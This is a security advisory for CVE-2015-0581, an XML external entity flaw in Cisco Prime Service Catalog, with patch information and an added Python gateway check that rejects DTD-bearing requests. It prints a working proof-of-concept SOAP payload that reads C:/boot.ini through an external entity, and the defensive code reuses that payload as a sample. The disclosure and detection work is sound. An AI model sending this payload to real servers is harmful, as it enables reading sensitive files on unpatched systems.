Advisory ID:
OSI-1501
Description:
The XML parser of Cisco Prime Service Catalog suffers from an XML External Entity (XXE) processing vulnerability that could allow an authenticated remote attacker either to cause a denial of service condition (resource consumption) or to retrieve sensitive data (local file access).
Researcher:
Alexis Dimitriadis (a.dimitriadis[a t]obrela[do t]com)
Vulnerability:
CVE-2015-0581: Cisco Prime Service Catalog XML External Entity Processing Vulnerability
CVSS Base Score: 7.0, CVSS Temporal Score: 5.8
Identification date:
09/06/2014
Solution – fix & patch:
Cisco has released Prime Service Catalog 10.1 as well as a patch for 9.4.1, 9.4.1R2, 10.0, and 10.0R2 to remediate this vulnerability.
References:
Mitre entry: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0581
Cisco advisory: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-psc-xmlee
PoC:
The following information is a PoC that reads the local ‘boot.ini’ file of the underlying host through the external entity; note that directories can also be listed the same way.
Url:
/RequestCenter/services/ServiceManagerTaskService
Post data:
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY varname SYSTEM "file:///C:/boot.ini">]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:req="http://smtask.api.newscale.com">
<soapenv:Header><req:AuthenticationToken>
<req:Username>username&varname;</req:Username><req:Password>password</req:Password>
</req:AuthenticationToken></soapenv:Header>
<soapenv:Body><req:getAuthorizationsForUser>
<req:userLoginName>username</req:userLoginName><req:startRow>0</req:startRow>
<req:numberOfRows>9999</req:numberOfRows><req:status>1</req:status>
<req:viewType>2</req:viewType>
</req:getAuthorizationsForUser></soapenv:Body></soapenv:Envelope>
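For defenders, a gateway-side check that refuses this request class before it reaches the vulnerable service. This is an added example, not part of the advisory or of Cisco's patch; it uses Python's stdlib expat parser, and the sample bodies are constructed from the PoC shape above (the element names, the hypothetical POC_BODY/CLEAN_BODY constants and the request_verdict function are assumptions for illustration).

```python
import xml.parsers.expat

class XxeAttempt(Exception):
    "Raised when a request carries a DOCTYPE or entity declaration."

def parse_soap_hardened(body: bytes) -> dict:
    """Parse one SOAP request with expat, refusing DTD/entity constructs.
    Returns {local element name: text} for the leaf elements."""
    parser = xml.parsers.expat.ParserCreate()
    leaves, stack, buf = {}, [], []
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XxeAttempt(f"DOCTYPE '{name}' is not permitted in a SOAP request")
    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise XxeAttempt(f"entity '{name}' (SYSTEM={sysid}) refused")
    def on_start(tag, attrs):
        stack.append(tag.split(":")[-1])  # keep the local name only
        buf.clear()
    def on_end(tag):
        text = "".join(buf).strip()
        if text:
            leaves[stack[-1]] = text
        stack.pop()
        buf.clear()
    parser.StartDoctypeDeclHandler = on_doctype   # fires before any <!ENTITY>
    parser.EntityDeclHandler = on_entity_decl     # belt and braces
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = buf.append
    parser.EndElementHandler = on_end
    parser.Parse(body, True)
    return leaves

def request_verdict(body: bytes) -> str:
    """Gateway-style decision: 'accept' or 'reject: <reason>'."""
    try:
        parse_soap_hardened(body)
    except XxeAttempt as exc:
        return f"reject: {exc}"
    except xml.parsers.expat.ExpatError as exc:
        return f"reject: malformed XML ({exc})"
    return "accept"

# Constructed samples (not captured traffic): the PoC prolog on a trimmed envelope, and the same call with no DTD.
ENVELOPE = (b'<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"'
            b' xmlns:req="http://smtask.api.newscale.com"><soapenv:Header>'
            b'<req:AuthenticationToken><req:Username>username%s</req:Username>'
            b'</req:AuthenticationToken></soapenv:Header><soapenv:Body/></soapenv:Envelope>')
POC_BODY = (b'<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo '
            b'[<!ENTITY varname SYSTEM "file:///C:/boot.ini">]>' + ENVELOPE % b"&varname;")
CLEAN_BODY = b'<?xml version="1.0" encoding="utf-8"?>' + ENVELOPE % b""
```

The PoC body is rejected at the DOCTYPE, before the SYSTEM entity is ever declared or dereferenced, while the DTD-free call parses normally.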